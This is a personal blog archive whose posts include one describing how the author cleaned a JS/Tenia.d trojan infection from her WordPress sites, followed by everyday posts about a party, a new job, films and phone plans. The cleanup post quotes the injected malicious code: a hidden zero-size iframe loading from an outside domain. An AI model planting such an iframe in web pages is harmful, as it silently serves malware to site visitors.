I thought it was only donnaville that was infected… nope! All my sites! And I’ve got a bunch. I ended up restoring a backup from 2 weeks ago for them. It worked fine. In fact, I am thinking I may do the same thing for this site since one of my other sites somehow kept the current posts which is why I didn’t want to do a restore here, thinking I may lose the last couple weeks of entries. My big fear is that there are more infected files on donnaville that I am just missing. That’s the reason I am thinking of doing a restore here too. I do not understand the hacker’s mentality. I understand they are making money but STILL! It’s just rude and obnoxious and plain EVIL!

Alternate title: Oh my gosh! My Website’s been hacked!
What do I do now?

A reader recently left me a comment stating that when he brought my Web site up on his browser, his anti virus detected a trojan horse virus called JS/Tenia.d. I immediately started googling, trying to come up with instructions on what to do. Unfortunately, there was very little out there and I had to figure it out on my own. Please understand that it’s totally possible I went about ridding myself of this beast in a crazy backwards manner but it seems to have worked and so I share it with you. Here’s what I did:

1. I checked the page source of my home page and found a snippet of code under the closing html tag that looked suspicious:

<iframe src=”http://google-stat.com/tomi/?t=2″ width=0 height=0 style=”hidden” frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

It turns out, this code was appended to the bottom of ALL my pages. Every single stinkin’ one.

2. I downloaded and installed the plugin: WordPress Exploit Scanner. This plugin searches and reports on all “text that is commonly used by spammers and hackers when a website is compromised.” It’s gonna spit out a long report… try not to get too discouraged. You are going to have to go through this report and see which files have been tampered with. And then you are going to either delete the file or cut out the malicious code. You have to be smart about this because you don’t want to cut out too much (such as the good code) and mistakenly take down your own Web site. Plus, there are quite a number of false positives so you are going to have to determine if it’s a real issue or not.

Now here’s the good news: The date/time stamp on the files will help you determine which files have been tampered with– I noticed all the bad files were tampered with on March 22 so I started looking for all files dated March 22.

The files that I ended up editing were index.php AND almost all the txt, xml, and html files within WordPress. Again, just look to see when they were last edited, that will give you a good idea of which files you need to touch. And I know there’s a lot of folders within folders within folders, use the Workpress Exploit scan report to point you to which folders you need to hunt through.

3. All my old non-Wordpress archives and all my WP-themes were appended with the lovely malicious code. There were far too many files for me to delete the code manually. After sobbing and wondering if I could hire someone to spend the next 5 weeks deleting the code I realized I could just have my hosting company restore a back up to a folder on the server. From there I just copied over the folders that contained my old archives and my themes. Now don’t get me wrong, this took quite awhile and my little ftp program was nearly out of breath by the end but at least I didn’t have to remove the code manually.

4. How this code even got on my Web site, I have no idea! Did my computer have the trojan horse on it and when I logged into my Web site the thing ran rampant? Did someone figure out my login and password? Was it a hole in my browser? Who knows. So just to be safe, I changed my passwords and I ran a thorough anti virus scan on my computer. (Surprise, Surprise, there were two trojans hiding on my computer!)

I hope this helps people figure out what to do and saves you some time. Just remember that the people responsible for hacks and spam and viruses will eventually have it come back and bite them. May mosquitoes fly into their noses and lay eggs in their sinus cavities.

To all you computer geeks out there, feel free to leave a comment if you have any other suggestions as to how this can be fixed or at least averted.

Donnaville was hacked on March 22. Please run your anti virus and keep an eye on the trojan called, JS/Tenia.d. I am working on getting the site cleaned up. I think the front page is okay but the really old archives are still infected. If anyone has any idea on how to remove malicious script from pages, contact me!

Thank you to Jason H for alerting me. I had no idea.

I had a really busy weekend. Saturday I went to a friend’s 40th Surprise Birthday Party. It was a nice party but I would have to say the best part of it was the cake his mother, wife and sister got him. The cake was in the shape of a woman’s torso. It had huge boobs and… a vagina. Yes! The cake had a vagina made of icing and roasted coconut shavings. At the end of the party all that was left of the cake was the vagina since no one could get themselves to eat it. Which I gotta say surprised me– I honestly thought that would have been the first piece to go. The funny part of all of this is I took a picture of the cake and I keep thinking maybe I should post it… but I can’t do it. It’s just too gross. No picture. Sorry guys.

Sunday was spent with Audra and Lisa doing pysanky. Pookie asked me to make him an egg with a flaming skull on it. Normally I am a real stickler for traditional eggs– if you want Snoopy, go get a Paas kit! But I couldn’t turn down a challenge!

Yeah, I know, you can’t get any more Easter than that!

Audra made Halushki which I LOVED! And she used egg noodles which I thought was brilliant. My mom always made her own noodles which is what has stopped me from making it– sheer intimidation. Here’s a link to a pretty good recipe— I think variation 2 is the better one. And instead of bacon grease, you can just use butter— a lot of butter. Because it’s the healthier option 🙂

Work is going well. They are preparing me well. This week will be another week of mainly training. Today I got to work from home which was a sheer joy. Of course I spent the entire time on the phone cold calling. This is a good thing. I am one of those weird people who don’t mind it… mainly because I see past the initial discomfort to the whole lotta money it makes me. Rejection is something I faced repeatedly as a nerdy, geeky child and somehow I ended up in sales so I could continue to face it on an hourly basis. Life is weird.

Yeah, I am glad I didn’t link to the vagina cake picture. That would have been wrong.

I survived my first week!!! The days were spent in training, learning the ropes. I got a lot of information dumped on me but I think I am processing all of it okay. Monday is my first cold calling day and then we do more training to reduce the bumps that I ran into on Monday. I think everything is going to be fine. I feel good about it.

Has anyone watched the TV show, The Mentalist? Simon Baker reminds me so much of a young Geraint Wyn Davies! If I was a big time producer I would cast Simon as Nicholas (Knight) de Brabant in a REMAKE of Forever Knight. Ever since I had this idea I’ve been trying to decide who else to cast. Unfortunately I am not coming up with anything realistic since last night I watched an old movie and had the thought, “Vincent Price would be perfect as LaCroix… too bad he’s dead.”

Speaking of that old movie, holy cow it was creepy! It’s called The Long Night. Henry Fonda kills Vincent Price and barricades himself in his little apartment and the flashbacks he has comprise the rest of the movie. Fonda loves Barbara Bel Geddes but she’s under the spell of a MAGICIAN portrayed by (who else?) Vincent Price. Vincent’s hair is died gray but it’s clear he’s really a young man. Yeah, that was Hollywood magic back then folks. He keeps trying to seduce Barbara but then out of nowhere tells Fonda that he’s actually her father. It turns out it’s a lie and Fonda eventually just kills him because Vincent is a huge douche bag. Yes, I loved it but it was really just very silly. I mean, is it no wonder Barbara was drawn to Vincent? Her boyfriend, Fonda, was clearly a loose cannon.

I feel lucky that when I think of a magician, I am aware they were once tuxedoed men wearing capes and pulling rabbits out of top hats and not just long-haired dancers with wind machines.

Speaking of douche bags, this is only the second time in my entire life I have used that term for a person. The first time occurred just a few weeks ago when I was watching Celebrity Apprentice. Donald Trump’s son appeared on the screen and in a total reflexive action I said, “That guy looks like a total douche bag!” I felt horrible saying it but I do feel it is the perfect adjective to describe him. There are a few reasons why I have never used that word prior to seeing Donny Trump. I had a girlfriend named Usha and all the boys in 4th grade used to call her Usha the Douche Bag. I could tell it hurt her and so I pretty much vowed never to call anyone that name. Plus Usha got a restraining order on those boys and I realized that douche bag was a much stronger term than jerk or idiot especially if you could get a restraining order because of it. Perhaps Donny Trump isn’t a douche bag but he really looks like one.

I had a great first day of work! Glen Beck II has my first 3 weeks chock full of training all scheduled. This is a huge change from what I experienced at my old place. There is was either sink or swim. I am guessing because this company found me through a recruiter and paid some serious moolah, they are going to make sure I succeed. All good!

And now we move on to day two!

I am going back to work tomorrow. It’s a strange feeling, knowing I will actually have something productive to do during the day. And I am nervous. I’ve gotten really comfortable having 24 hours a day to piss away. Now that time is shortened to non-working hours. How will I ever read all my rss feeds!?! And am I even capable of learning new things? My brain is chock full of so much useless stuff how will I ever be able to make room for the new info I will need for this job? I can’t believe it’s time to go back to work again.

I kinda feel like this:

I dreamt I met James Garner and told him how much I loved the Polaroid commercials he did in the 70’s. Sometimes I wonder where my brain comes up with such crap?

Yesterday I set my alarm for 7am. At 7am I woke up, looked around and decided it was too dark to get up. I reset it for 7:30 and found myself waking up at 9am. I was disgusted with myself but determined to wake up earlier today. I set my alarm for 7:30 but when I opened my eyes the next morning and peeked at my alarm clock, it read 8:30. Again I was disgusted with myself but I do intend to wake up early tomorrow. Right now it seems I am waking earlier in 1/2 hour increments– I may be perfectly fine come Monday.

Last night I went to Latin Impact class. The instructor told us that tonight we would be celebrating Carnival. She then she handed out beads and feathered masks for everyone to wear! Oh my gosh it was so much fun! Eventually everyone removed their masks because it was just too difficult to wear while doing the PUNTA! Especially with all the sweat dripping down our faces. I will admit that I am finding it easier and easier. Sure, hip shaking is not in my culture but I am working hard at it and I am sure I will get it soon enough.

Pookie and I are going to take a little trip– a last hurrah before I must get back to working. I am excited. It seems like I’ve been stuck here in the donnavilla for months… wait, I have been here for months. Yeah, I really gotta get the heck out of Dodge.

It’s time to start shopping for a new cell phone company/plan.

Verizon
1 line: 89.99 – 900 minutes, unlimited Internet = 89.99
2 lines: 119.99 – 700 minutes, unlimited Internet = 119.99

ATT – w/ ROLLOVER
1 line: $59.99 – 900 minutes + 30.00 for unlimited Internet = 89.99
2 lines: $69.99 – 700 minutes + 9.99 for extra line + 30 for unlimited Internet = 109.98

SPRINT
1 line: $89.99 – 900 minutes, unlimited Internet – 89.99
2 lines: $129.99 – 1500 minutes, unlimited Internet – 129.99

I think I will wait until I start working the job before I commit to anything. Although I do want to have my ducks in a row ahead of time. Next item to tackle: iPhone Vs Blackberry

Went to the Philly Boat Show this weekend. Saw boats that cost more than my house. The prices struck me as overly high but then I realized $250,000.00 isn’t that much money anymore, especially when the government is just giving away trillions of dollars. On a different note, I saw Twiggy, the water skiing squirrel!

I got a week left of no work, no stress, and I plan on making the most of it. I must admit that deep down I am a little scared. But I also feel very very lucky. As soon as I start working again it’s going to feel like I never stopped working. The 3 months of unemployment will seem like a long weekend. And of course the unknown is scary but I’ve experienced this type of thing before…so is it really unknown? Gosh, I remember 3 years ago walking into the HQs of my last place of employment… Oh my gosh that was frightening! It was a rat’s nest! I honestly considered running out! Yet it turned out to be perfectly fine. Heck, better than just fine, it worked out really well for me. And I am sure this new place will be the same.